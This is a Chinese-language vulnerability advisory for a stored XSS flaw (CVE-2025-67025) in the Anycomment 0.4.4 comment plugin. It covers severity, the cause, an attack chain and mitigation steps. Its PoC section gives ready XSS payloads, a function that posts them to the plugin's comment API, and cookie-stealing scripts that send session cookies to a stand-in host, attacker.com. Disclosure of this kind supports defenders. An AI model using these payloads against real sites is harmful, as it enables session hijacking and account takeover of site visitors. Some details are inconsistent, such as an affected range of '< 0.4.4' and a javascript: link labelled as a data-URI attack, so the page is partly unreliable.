CVE-2025-67025 Anycomment 0.4.4 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-67025

漏洞类型

跨站脚本攻击(XSS)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Anycomment anycomment.io 0.4.4

漏洞概述

CVE-2025-67025是Anycomment评论系统中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Anycomment插件的评论功能模块中，攻击者可以通过在评论内容中注入恶意JavaScript代码，当其他用户查看包含恶意代码的评论时，恶意脚本将在受害者浏览器中执行。成功利用此漏洞的攻击者可以窃取用户的会话Cookie、劫持用户账户、进行钓鱼攻击或修改页面内容。由于CVSS评分为6.1，属于中危级别，攻击复杂度较低且无需认证，但需要用户交互才能触发。该漏洞影响使用Anycomment 0.4.4版本的所有网站，对使用该插件进行评论管理的WordPress及其他平台构成安全风险。

技术细节

该漏洞是典型的存储型XSS（Stored XSS）漏洞，存在于Anycomment插件的评论提交和渲染环节。攻击者利用该漏洞在评论输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=恶意代码>。由于Anycomment在存储评论时未对用户输入进行充分的HTML转义和过滤，恶意代码被直接存入数据库。当其他用户访问页面并查看该评论时，未经过滤的恶意脚本随页面HTML一起返回，并在受害者浏览器中作为可信任脚本执行。攻击者可以通过此方式窃取受害者的认证令牌、会话ID或其他敏感信息，进而实施账户接管。漏洞的根本原因在于输入验证不足和输出编码缺失，建议在服务端和客户端双端实现严格的输入过滤和输出编码机制。

攻击链分析

STEP 1

步骤1

攻击者访问使用Anycomment 0.4.4的网站，找到评论功能入口

STEP 2

步骤2

攻击者在评论表单中注入恶意JavaScript代码，如<script>标签或事件处理器

STEP 3

步骤3

由于插件未进行输入过滤，恶意代码被直接存入数据库

STEP 4

步骤4

普通用户访问页面，评论内容被加载到页面中

STEP 5

步骤5

恶意脚本在用户浏览器中执行，窃取Cookie或执行其他恶意操作

STEP 6

步骤6

攻击者利用窃取的认证信息劫持用户会话或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67025 PoC - Stored XSS in Anycomment
// Attack vector: Inject malicious script in comment field

// Method 1: Basic script injection
const maliciousComment = {
    content: '<script>alert(document.cookie)</script>',
    author: 'Attacker',
    post_id: 123
};

// Method 2: Event handler injection (bypasses some filters)
const maliciousComment2 = {
    content: '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)">',
    author: 'Attacker',
    post_id: 123
};

// Method 3: DOM-based XSS using data URI
const maliciousComment3 = {
    content: '<a href="javascript:alert(document.domain)">Click me</a>',
    author: 'Attacker',
    post_id: 123
};

// Send malicious comment via Anycomment API
async function exploitXSS(targetUrl) {
    const response = await fetch(`${targetUrl}/wp-json/anycomment/v1/comment`, {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify(maliciousComment)
    });
    return response.json();
}

// Cookie stealing payload
const stealPayload = '<script>fetch("https://attacker.com/log?cookie="+btoa(document.cookie))</script>';

影响范围

Anycomment < 0.4.4

防御指南

临时缓解措施

在等待官方补丁期间，可通过以下方式临时缓解：1) 禁用或限制评论功能；2) 在Web应用防火墙(WAF)中添加XSS过滤规则；3) 使用WordPress安全插件启用额外的XSS防护；4) 对评论输出添加JavaScript端的内容过滤脚本；5) 监控异常评论提交行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-67025
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-67025
3 Details https://www.cvedetails.com/cve/CVE-2025-67025/
4 VulDB https://vuldb.com/cve/CVE-2025-67025
5 Link https://anycomment.io/site/changelog
6 Link https://bdu.fstec.ru/vul/2023-08900